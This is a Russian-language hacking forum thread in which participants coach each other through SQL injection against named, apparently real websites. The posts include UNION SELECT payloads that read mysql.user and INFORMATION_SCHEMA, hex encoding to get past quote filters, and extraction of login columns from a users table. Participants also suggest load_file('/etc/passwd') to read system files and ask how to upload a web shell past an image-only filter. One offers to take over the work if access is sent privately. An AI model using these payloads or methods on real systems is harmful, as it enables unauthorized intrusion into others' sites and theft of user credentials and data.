Ваши вопросы по уязвимостям.

ошибка та же? вы уверены, что есть доступ к таблице mysql? проще проверить функцией load_file()

 

Сначала проверь, есть ли доступ к mysql.user
union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user

 

вот

Code:

ja-zdorov.com/images/php.php

 

при таком +union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user--
пишет SELECT command denied to user 'u1094094_sangha'@'ип сайта' for table 'user' - это значит что нет?

 

запрос:

Code:

SELECT 1 FROM mysql.user;

наличие доступа к бд mysql или наоборот, отсутствие, не говорит о том, что у пользователя нет file_priv. еще раз говорю, попробуйте load_file('/etc/passwd'). в вашем случае /etc/passwd надо заенкодить в hex.

отправьте доступ в лс, посмотрю

 

Значит нет доступа.

 

Подскажите,как вытащить есть таблица [users] стобцы из неё я могу прочитать,но вот дальше никак, таблица в квадратных скобках

 

Code:

SELECT 1,2,3,4,5 FROM `[users]`-- 

 

)) уже по разному пробовала,не хочет
http://bt c45.net/forum.php?sub=166 union select 1,2,3,4,TABLE_NAME,6,7 FROM INFORMATION_SCHEMA.TABLES LIMIT 98,1

кавычки фильтруются

 

колонки:

Code:

http://btc45.net/forum.php?sub=166+union+select+1,2,3,4,column_NAME,6,7+FROM+INFORMATION_SCHEMA.columns+where+table_name=0x5b75736572735d

записи из таблицы:

Code:

http://btc45.net/forum.php?sub=166+union+select+1,2,3,4,login,6,7+FROM+`[users]`+limit+4,1

что именно он не хочет?

 

блин,всё поняла кавычки не те поставила (( спасиб

 

Есть админка, но запрещено заливать файлы .php только изображение, как можно залить шелл. Проинклудить не получается.

 

Что можно с этим сделать?
http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=bdd49c98329a5db8044c192d4033f887&tx_artbase[__referrer][extensionName]=Artbase&tx_artbase[__referrer][controllerName]=Search&tx_artbase[__referrer][actionName]=showSearchForm&tx_artbase[__hmac]=a:3:{s:11:%22searchfield%22;i:1;s:6:%22action%22;i:1;s:10:%22controller%22;i:1;}5165223b6f84dec570ccfd7b1d7a2f1958787a14&tx_artbase[searchfield]=a?

урезал лишнее
http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a736c29512a&tx_artbase%5Bsearchfield%5D=Craig

 

сайт на вп, есть рут бд, file_priv Y , админка заблочена по ип, прочитать файлы могу, а вот заливка при файл прив не работает, путь раскрыл. перепробовал все папки вп

выдет ерор 13 cant create\write

 

в /tmp льется?

 

нет. таже ошибка, перепробовал уже все пути. читается все, файл прив Y ,доступ рут, но не куда записать не могу, пути раскрыл .. не пойму что за беда такая

 

Скорее всего при конфигурации не задана tmp директория. Ничего не поделать.

 

я наверное чегото не понимаю, а причем тут tmp , когда я пробую литься в другие дериктории

 

http://www.cyberciti.biz/faq/mysqld-innodb-error-unable-to-create-temporary-file/
Файлы же льются не прямо в директорию(host ->dir), а host -> tmp ->dir.

 

Если доступ есть на чтение файлов и к базе, то может лучше ковырять в сторону админской учетки форума\сайта?